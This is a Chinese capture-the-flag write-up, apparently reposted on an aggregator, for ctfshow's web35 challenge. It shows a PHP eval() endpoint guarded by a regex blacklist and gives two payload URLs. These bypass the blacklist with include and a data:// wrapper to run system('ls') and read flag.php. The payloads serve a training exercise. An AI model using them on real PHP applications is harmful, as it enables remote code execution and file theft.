当前位置: 首页 > news >正文

[ctfshow web入门] web35

news 2025/8/5 2:18:35

信息收集

这一题多了尖括号< =的过滤,这也没啥影响

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

解题

参考[ctfshow web入门] web31
使用最简单的解法,具体描述参考web31,不再赘述

?c=include$_GET[1]?>&1=data://text/plain,<?php system("ls") ?>
?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php") ?>

在这里插入图片描述

web34    目录    web36

http://www.dtcms.com/a/124780.html

相关文章:

  • 【多线程-第四天-自己模拟SDWebImage的下载图片功能-缓存管理 Objective-C语言】
  • 2025最新系统 Git 教程(五)
  • 【Python算法】基础语法、算法技巧模板、二分、DFS与BFS
  • selenium快速入门
  • 如何实现H5端对接钉钉登录并优雅扩展其他平台
  • 《计算机视觉度量:从特征描述到深度学习》—深度学习工业检测方案评估
  • 人工智能在医疗信息化设备上为医疗行业带来了诸多变革
  • vscode 连不上 Ubuntu 18 server 的解决方案
  • MySQL:日志
  • TDEngine 配置
  • Spring AI应用:利用DeepSeek+嵌入模型+Milvus向量数据库实现检索增强生成--RAG应用(超详细)
  • 根据 PID 找到对应的 Docker 容器
  • 【专题】图论
  • Docker 容器内运行程序的性能开销
  • 使用SQL查询ES数据
  • 考研单词笔记 2025.04.10
  • Ansible:Playbook-template模板详解
  • STM32F103C8T6单片机开发:简单说说单片机的外部GPIO中断(标准库)
  • 基于landsat与Modis影像的遥感技术的生态环境质量评价
  • 纯键盘操作电脑,丢弃鼠标!!!
  • 小程序租赁系统源码功能分享
  • 汽车氛围灯400V浪涌防护方案之SD3002P4-3的应用实践
  • Python语言的网络安全
  • 3D激光轮廓仪知识整理(待完善)
  • Spring其它知识点
  • ELF文件的LCS(Linker Command Script)学习
  • Fast网络速度测试工具
  • OCR定制化:解锁文字识别的无限可能
  • C# task任务异步编程提高UI的响应性
  • 【C++游戏引擎开发】第13篇:光照模型与Phong基础实现